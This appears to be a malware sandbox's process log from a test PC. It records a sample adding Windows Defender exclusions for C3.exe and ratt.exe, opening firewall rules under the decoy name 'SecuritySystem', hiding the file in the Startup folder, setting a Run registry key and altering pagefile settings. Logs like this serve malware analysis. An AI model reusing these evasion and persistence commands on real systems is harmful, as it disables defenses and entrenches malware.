nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com  2964
WMIC.exe wmic ComputerSystem get Domain  3056
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"'  1484
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'  2232
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"'  2432
7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y C3.7z  2596
InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"  2632
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes  2980
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes  2104
WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False  2196
WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000  2540
attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"  776
reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F  1520